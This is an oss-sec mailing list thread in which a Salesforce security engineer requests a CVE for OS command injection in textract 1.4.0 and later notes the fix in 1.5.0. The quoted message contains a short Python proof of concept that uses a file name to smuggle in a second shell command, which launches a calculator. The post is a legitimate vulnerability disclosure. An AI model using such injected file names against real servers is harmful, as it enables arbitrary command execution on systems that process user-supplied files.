oss-sec mailing list archives
Re: CVE request - textract 1.4.0 - OS Command Injection
From: Pierre Ernst <pernst () salesforce com>
Date: Thu, 17 Nov 2016 09:18:26 -0500
Version 1.5.0 includes a fix for this https://github.com/deanmalmgren/textract/releases/tag/v1.5.0 On Thu, Oct 20, 2016 at 5:40 PM, Pierre Ernst <pernst () salesforce com> wrote:
The Python textract component (https://github.com/ deanmalmgren/textract/tree/v1.4.0) is vulnerable to OS command injection. this fork contains a fix: https://github.com/pierre-ernst/textract Parsing a file with a malicious name leads to arbitrary OS command injection, this is especially risky when parsing user-supplied files on a server (e.g. uploaded files) PoC: import textract import sys import os # create a file with a malicious name and arbitrary content fileName = './test";gnome-calculator;#.pdf' file = open(fileName,'w+') file.write('Pierre Ernst, Salesforce') file.close() # parse newly created file text = textract.process(fileName) print text # cleanup os.remove(fileName); -- Pierre Ernst Salesforce
-- Pierre Ernst Senior Application Security Engineer M&A Security Salesforce.com mobile: +1 613-404-1450 timezone: EDT
Current thread:
- CVE request - textract 1.4.0 - OS Command Injection Pierre Ernst (Oct 20)
- Re: CVE request - textract 1.4.0 - OS Command Injection Pierre Ernst (Nov 17)